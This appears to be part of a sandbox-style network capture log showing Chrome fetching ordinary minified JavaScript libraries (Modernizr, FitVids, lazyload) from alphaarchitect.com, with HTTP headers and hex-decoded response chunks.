                                                                                                                                                                                                                                                                        Data Ascii: n*n*n*n},easeOutQuart:function(n){return 1-e(1-n,4)},easeInOutQuart:function(n){return n<.5?8*n*n*n*n:1-e(-2*n+2,4)/2},easeInQuint:function(n){return n*n*n*n*n},easeOutQuint:function(n){return 1-e(1-n,5)},easeInOutQuint:function(n){return n<.5?16*n*n*n*n*
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC42INData Raw: 20 6e 3c 2e 35 3f 28 31 2d 66 28 31 2d 32 2a 6e 29 29 2f 32 3a 28 31 2b 66 28 32 2a 6e 2d 31 29 29 2f 32 7d 7d 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: n<.5?(1-f(1-2*n))/2:(1+f(2*n-1))/2}})})
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        22192.168.2.449767141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC832OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-466f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c75de11819-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC877INData Raw: 34 36 36 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 6f 29 7b 76 61 72 20 72 3d 5b 5d 2c 61 3d 7b 5f 76 65 72 73 69 6f 6e 3a 22 33 2e 31 32 2e 30 22 2c 5f 63 6f 6e 66 69 67 3a 7b 63 6c 61 73 73 50 72 65 66 69 78 3a 22 22 2c 65 6e 61 62 6c 65 43 6c 61 73 73 65 73 3a 21 30 2c 65 6e 61 62 6c 65 4a 53 43 6c 61 73 73 3a 21 30 2c 75 73 65 50 72 65 66 69 78 65 73 3a 21 30 7d 2c 5f 71 3a 5b 5d 2c 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 6e 5b 65 5d 29 7d 2c 30 29 7d 2c 61 64 64 54 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 65 2c 66 6e 3a 74 2c 6f 70 74 69 6f 6e 73 3a 6e 7d 29 7d 2c
                                                                                                                                                                                                                                                                        Data Ascii: 466f!function(e,t,n,o){var r=[],a={_version:"3.12.0",_config:{classPrefix:"",enableClasses:!0,enableJSClass:!0,usePrefixes:!0},_q:[],on:function(e,t){var n=this;setTimeout(function(){t(n[e])},0)},addTest:function(e,t,n){r.push({name:e,fn:t,options:n})},
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 5b 6f 5b 31 5d 5d 29 2c 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 69 3b 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 28 29 3a 74 2c 31 3d 3d 3d 6f 2e 6c 65 6e 67 74 68 3f 69 5b 6f 5b 30 5d 5d 3d 74 3a 28 21 69 5b 6f 5b 30 5d 5d 7c 7c 69 5b 6f 5b 30 5d 5d 69 6e 73 74 61 6e 63 65 6f 66 20 42 6f 6f 6c 65 61 6e 7c 7c 28 69 5b 6f 5b 30 5d 5d 3d 6e 65 77 20 42 6f 6f 6c 65 61 6e 28 69 5b 6f 5b 30 5d 5d 29 29 2c 69 5b 6f 5b 30 5d 5d 5b 6f 5b 31 5d 5d 3d 74 29 2c 66 28 5b 28 74 26 26 21 31 21 3d 3d 74 3f 22 22 3a 22 6e 6f 2d 22 29 2b 6f 2e 6a 6f 69 6e 28 22 2d 22 29 5d 29 2c 69 2e 5f 74 72 69 67 67 65 72 28 65 2c 74 29 7d 72 65 74 75 72 6e 20 69 7d 6c 3d 63 28 64 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 22 75
                                                                                                                                                                                                                                                                        Data Ascii: [o[1]]),void 0!==r)return i;t="function"==typeof t?t():t,1===o.length?i[o[0]]=t:(!i[o[0]]||i[o[0]]instanceof Boolean||(i[o[0]]=new Boolean(i[o[0]])),i[o[0]][o[1]]=t),f([(t&&!1!==t?"":"no-")+o.join("-")]),i._trigger(e,t)}return i}l=c(d={}.hasOwnProperty,"u
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 21 28 22 6f 6e 62 6c 75 72 22 69 6e 20 75 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 21 21 74 26 26 28 6e 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 6e 7c 7c 28 6e 3d 79 28 6e 7c 7c 22 64 69 76 22 29 29 2c 21 28 72 3d 28 74 3d 22 6f 6e 22 2b 74 29 69 6e 20 6e 29 26 26 65 26 26 28 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 7c 7c 28 6e 3d 79 28 22 64 69 76 22 29 29 2c 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 2c 22 22 29 2c 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 74 5d 2c 6e 5b 74 5d 21 3d 3d 6f 26 26 28 6e 5b 74 5d 3d 6f 29 2c 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 74 29 29 2c 72 29 7d 7d
                                                                                                                                                                                                                                                                        Data Ascii: nction(){var e=!("onblur"in u);return function(t,n){var r;return!!t&&(n&&"string"!=typeof n||(n=y(n||"div")),!(r=(t="on"+t)in n)&&e&&(n.setAttribute||(n=y("div")),n.setAttribute(t,""),r="function"==typeof n[t],n[t]!==o&&(n[t]=o),n.removeAttribute(t)),r)}}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 65 6e 74 2c 74 2e 63 72 65 61 74 65 46 72 61 67 3d 65 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 2c 74 2e 66 72 61 67 3d 74 2e 63 72 65 61 74 65 46 72 61 67 28 29 29 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 68 2e 73 68 69 76 4d 65 74 68 6f 64 73 3f 66 28 6e 2c 65 2c 74 29 3a 74 2e 63 72 65 61 74 65 45 6c 65 6d 28 6e 29 7d 2c 65 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 3d 46 75 6e 63 74 69 6f 6e 28 22 68 2c 66 22 2c 22 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 66 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 2c 63 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3b 68 2e 73 68 69 76 4d 65 74 68 6f 64 73 26 26 28 22 2b
                                                                                                                                                                                                                                                                        Data Ascii: ent,t.createFrag=e.createDocumentFragment,t.frag=t.createFrag()),e.createElement=function(n){return h.shivMethods?f(n,e,t):t.createElem(n)},e.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 6d 6c 35 3d 68 2c 6d 28 74 29 3b 76 61 72 20 76 2c 67 3d 2f 5e 24 7c 5c 62 28 3f 3a 61 6c 6c 7c 70 72 69 6e 74 29 5c 62 2f 2c 79 3d 22 68 74 6d 6c 35 73 68 69 76 22 2c 54 3d 21 28 6f 7c 7c 28 76 3d 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6e 61 6d 65 73 70 61 63 65 73 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 2e 61 70 70 6c 79 45 6c 65 6d 65 6e 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 2e 72 65 6d 6f 76 65 4e 6f 64 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 2e 61 74 74 61 63 68 45 76 65 6e 74 29 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 2c
                                                                                                                                                                                                                                                                        Data Ascii: ml5=h,m(t);var v,g=/^$|\b(?:all|print)\b/,y="html5shiv",T=!(o||(v=t.documentElement,void 0===t.namespaces||void 0===t.parentWindow||void 0===v.applyElement||void 0===v.removeNode||void 0===e.attachEvent));function b(e){for(var t,n=e.attributes,o=n.length,
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 6e 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 65 5b 74 5d 2e 72 65 6d 6f 76 65 4e 6f 64 65 28 29 7d 28 6e 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6f 2e 5f 72 65 6d 6f 76 65 53 68 65 65 74 54 69 6d 65 72 29 2c 6f 2e 5f 72 65 6d 6f 76 65 53 68 65 65 74 54 69 6d 65 72 3d 73 65 74 54 69 6d 65 6f 75 74 28 69 2c 35 30 30 29 7d 29 2c 65 2e 70 72 69 6e 74 53 68 69 76 65 64 3d 21 30 2c 65 7d 68 2e 74 79 70 65 2b 3d 22 20 70 72 69 6e 74 22 2c 68 2e 73 68 69 76 50 72 69 6e 74 3d 78 2c 78 28 74 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 26 26 28 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 68 29 7d 28 76 6f
                                                                                                                                                                                                                                                                        Data Ascii: n(){!function(e){for(var t=e.length;t--;)e[t].removeNode()}(n),clearTimeout(o._removeSheetTimer),o._removeSheetTimer=setTimeout(i,500)}),e.printShived=!0,e}h.type+=" print",h.shivPrint=x,x(t),"object"==typeof module&&module.exports&&(module.exports=h)}(vo
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 72 67 75 6d 65 6e 74 73 29 29 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 3f 22 77 61 72 6e 22 3a 22 6c 6f 67 22 3b 74 2e 63 6f 6e 73 6f 6c 65 5b 65 5d 2e 61 70 70 6c 79 28 74 2e 63 6f 6e 73 6f 6c 65 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 7d 29 2c 61 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 79 65 70 6e 6f 70 65 22 69 6e 20 74 3f 28 78 28 22 79 65 70 6e 6f 70 65 2e 6a 73 20 28 61 6b 61 20 4d 6f 64 65 72 6e 69 7a 72 2e 6c 6f 61 64 29 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 69 6e 63 6c 75 64 65 64 20 61 73 20 70 61 72 74 20 6f 66 20 4d 6f 64 65 72 6e 69 7a 72 2e 20 79 65 70 6e 6f 70 65 20 61 70 70 65 61 72 73 20
                                                                                                                                                                                                                                                                        Data Ascii: rguments))},x=function(){var e=console.warn?"warn":"log";t.console[e].apply(t.console,Array.prototype.slice.call(arguments))}),a.load=function(){"yepnope"in t?(x("yepnope.js (aka Modernizr.load) is no longer included as part of Modernizr. yepnope appears
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 22 43 53 53 22 69 6e 20 74 26 26 22 73 75 70 70 6f 72 74 73 22 69 6e 20 74 2e 43 53 53 29 7b 66 6f 72 28 3b 72 2d 2d 3b 29 69 66 28 74 2e 43 53 53 2e 73 75 70 70 6f 72 74 73 28 7a 28 65 5b 72 5d 29 2c 6e 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 69 66 28 22 43 53 53 53 75 70 70 6f 72 74 73 52 75 6c 65 22 69 6e 20 74 29 7b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 3b 72 2d 2d 3b 29 61 2e 70 75 73 68 28 22 28 22 2b 7a 28 65 5b 72 5d 29 2b 22 3a 22 2b 6e 2b 22 29 22 29 3b 72 65 74 75 72 6e 20 77 28 22 40 73 75 70 70 6f 72 74 73 20 28 22 2b 28 61 3d 61 2e 6a 6f 69 6e 28 22 20 6f 72 20 22 29 29 2b 22 29 20 7b 20 23 6d 6f 64 65 72 6e 69 7a
                                                                                                                                                                                                                                                                        Data Ascii: ar i=function(e,n){var r=e.length;if("CSS"in t&&"supports"in t.CSS){for(;r--;)if(t.CSS.supports(z(e[r]),n))return!0;return!1}if("CSSSupportsRule"in t){for(var a=[];r--;)a.push("("+z(e[r])+":"+n+")");return w("@supports ("+(a=a.join(" or "))+") { #moderniz
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 70 6c 69 74 28 22 20 22 29 3a 5b 22 22 2c 22 22 5d 3b 61 2e 5f 70 72 65 66 69 78 65 73 3d 4f 3b 61 2e 70 72 65 66 69 78 65 64 43 53 53 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 41 28 65 29 3b 72 65 74 75 72 6e 20 74 26 26 7a 28 74 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 28 65 2c 6f 2c 6f 2c 74 2c 6e 29 7d 61 2e 74 65 73 74 41 6c 6c 50 72 6f 70 73 3d 52 3b 76 61 72 20 4c 3d 61 2e 74 65 73 74 50 72 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4d 28 5b 65 5d 2c 6f 2c 74 2c 6e 29 7d 2c 42 3d 61 2e 74 65 73 74 53 74 79 6c 65 73 3d 77 3b 69 2e 61 64 64 54 65 73 74 28 22 74 6f 75 63 68 65 76 65 6e 74 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 6f 6e 74 6f 75
                                                                                                                                                                                                                                                                        Data Ascii: plit(" "):["",""];a._prefixes=O;a.prefixedCSS=function(e){var t=A(e);return t&&z(t)};function R(e,t,n){return j(e,o,o,t,n)}a.testAllProps=R;var L=a.testProp=function(e,t,n){return M([e],o,t,n)},B=a.testStyles=w;i.addTest("touchevents",function(){if("ontou
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 68 61 73 68 63 68 61 6e 67 65 22 2c 74 29 26 26 28 6e 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 3d 3d 3d 6f 7c 7c 6e 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 3e 37 29 7d 29 2c 69 2e 61 64 64 54 65 73 74 28 22 67 65 6f 6c 6f 63 61 74 69 6f 6e 22 2c 22 67 65 6f 6c 6f 63 61 74 69 6f 6e 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 2c 69 2e 61 64 64 54 65 73 74 28 22 68 69 73 74 6f 72 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 72 65 74 75 72 6e 21 21 65 26 26 28 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 41 6e 64 72 6f 69 64 20 32 2e 22 29 26 26 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 41 6e 64 72 6f 69 64 20 34 2e 30 22 29 7c 7c 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22
                                                                                                                                                                                                                                                                        Data Ascii: hashchange",t)&&(n.documentMode===o||n.documentMode>7)}),i.addTest("geolocation","geolocation"in navigator),i.addTest("history",function(){var e=navigator.userAgent;return!!e&&((-1===e.indexOf("Android 2.")&&-1===e.indexOf("Android 4.0")||-1===e.indexOf("


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        23192.168.2.449768141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC623OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-6e6"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c7580f43b3-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC878INData Raw: 36 65 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 66 69 74 56 69 64 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 7b 63 75 73 74 6f 6d 53 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 69 67 6e 6f 72 65 3a 6e 75 6c 6c 7d 3b 69 66 28 21 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 66 69 74 2d 76 69 64 73 2d 73 74 79 6c 65 22 29 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 70 3e 78 3c
                                                                                                                                                                                                                                                                        Data Ascii: 6e6!function(t){"use strict";t.fn.fitVids=function(e){var i={customSelector:null,ignore:null};if(!document.getElementById("fit-vids-style")){var r=document.head||document.getElementsByTagName("head")[0],a=document.createElement("div");a.innerHTML='<p>x<
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC895INData Raw: 68 69 73 29 2e 66 69 6e 64 28 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 28 61 3d 28 61 3d 61 2e 6e 6f 74 28 22 6f 62 6a 65 63 74 20 6f 62 6a 65 63 74 22 29 29 2e 6e 6f 74 28 72 29 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 69 66 28 21 28 65 2e 70 61 72 65 6e 74 73 28 72 29 2e 6c 65 6e 67 74 68 3e 30 7c 7c 22 65 6d 62 65 64 22 3d 3d 3d 74 68 69 73 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 65 2e 70 61 72 65 6e 74 28 22 6f 62 6a 65 63 74 22 29 2e 6c 65 6e 67 74 68 7c 7c 65 2e 70 61 72 65 6e 74 28 22 2e 66 6c 75 69 64 2d 77 69 64 74 68 2d 76 69 64 65 6f 2d 77 72 61 70 70 65 72 22 29 2e 6c 65 6e 67 74 68 29 29 7b 65 2e 63 73 73 28 22 68 65 69 67 68 74 22 29 7c 7c 65 2e 63 73 73 28
                                                                                                                                                                                                                                                                        Data Ascii: his).find(e.join(","));(a=(a=a.not("object object")).not(r)).each(function(){var e=t(this);if(!(e.parents(r).length>0||"embed"===this.tagName.toLowerCase()&&e.parent("object").length||e.parent(".fluid-width-video-wrapper").length)){e.css("height")||e.css(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        24192.168.2.449770141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC793OUTGET /wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 29 Nov 2024 17:16:38 GMT
                                                                                                                                                                                                                                                                        ETag: W/"6749f6f6-22bc"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c87f804333-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
